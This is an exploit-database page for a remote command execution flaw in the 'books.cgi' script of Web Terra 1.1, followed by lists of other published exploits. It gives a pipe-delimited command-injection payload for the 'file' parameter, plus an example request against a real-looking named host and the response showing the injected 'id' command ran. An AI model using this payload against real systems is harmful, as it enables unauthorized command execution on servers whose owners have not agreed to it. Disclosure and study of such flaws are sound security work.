Menu

Search for hundreds of thousands of exploits

"Web Terra 1.1 - 'books.cgi' Remote Command Execution"

Author

Exploit author

"felipe andrian"

Platform

Exploit platform

cgi

Release date

Exploit published date

2014-05-24

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
[+] Remote Comand Execution on books.cgi Web Terra v. 1.1
[+] Date: 21/05/2014
[+] CWE number: CWE-78
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vendor Homepage: http://www2.inforyoma.or.jp/~terra
[+] Vulnerable File: books.cgi
[+] Version : 1.1
[+] Exploit: http://host/patch/books.cgi?file=|<command>|


[+] Example Request:
GET /webnovel/books.cgi?file=|id| HTTP/1.1
Host: redsuns.x0.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive


HTTP/1.1 200 OK
Date: Wed, 21 May 2014 18:59:05 GMT
Server: Apache/1.3.42 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 498

<!DOCTYPE HTML PUBLIC -//IETF//DTD HTML//EN>
<html><head>
<meta http-equiv=Content-Type content=text/html; charset=x-sjis>
<title></title></head>
<body bgcolor=#637057>
<p align=center><font size=3></font><br>
| <a href=booksregist.cgi?file=|id|&subject=>?·?M?·?é</a>
 || <a href=booksvew.cgi?file=|id|&subject=>???Ò?ê??</a>
 || <a href=booksedit.cgi?file=|id|&subject=>?ύX?ù³</a>
 || <a href=books.htm>?¶?É?É?ß?é</a>
 |</p><hr>
uid=1085(spider) gid=1000(users) groups=1000(users)
</body></html>

[+] More About : http://cwe.mitre.org/data/definitions/78.html
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-19 "Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection" webapps cgi "Gabriele Zuddas"
2020-10-29 "Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)" webapps cgi "Valerio Alessandroni"
2020-04-23 "Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)" webapps cgi "Dhiraj Mishra"
2020-04-10 "Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal" webapps cgi "Basim Alabdullah"
2020-03-30 "Zen Load Balancer 3.10.1 - Remote Code Execution" webapps cgi "Cody Sixteen"
2020-02-11 "CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting" webapps cgi Luca.Chiou
2019-09-09 "Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure" webapps cgi LiquidWorm
2019-07-12 "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" webapps cgi "Chris Lyne"
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2019-02-11 "Smoothwall Express 3.1-SP4 - Cross-Site Scripting" webapps cgi "Ozer Goker"
Release Date Title Type Platform Author
2019-06-25 "AZADMIN CMS 1.0 - SQL Injection" webapps php "felipe andrian"
2019-05-13 "XOOPS 2.5.9 - SQL Injection" webapps php "felipe andrian"
2019-05-06 "microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection" webapps asp "felipe andrian"
2019-05-06 "PHPads 2.0 - 'click.php3?bannerID' SQL Injection" webapps php "felipe andrian"
2014-05-24 "Web Terra 1.1 - 'books.cgi' Remote Command Execution" webapps cgi "felipe andrian"
2014-04-14 "WordPress Theme LineNity 1.20 - Local File Inclusion" webapps php "felipe andrian"
2014-04-02 "CIS Manager CMS - SQL Injection" webapps asp "felipe andrian"
2014-04-01 "Horde Webmail 5.1 - Open Redirect" webapps php "felipe andrian"
2014-03-29 "ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect" webapps asp "felipe andrian"
2014-03-24 "BigDump 0.35b - Arbitrary File Upload" webapps php "felipe andrian"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.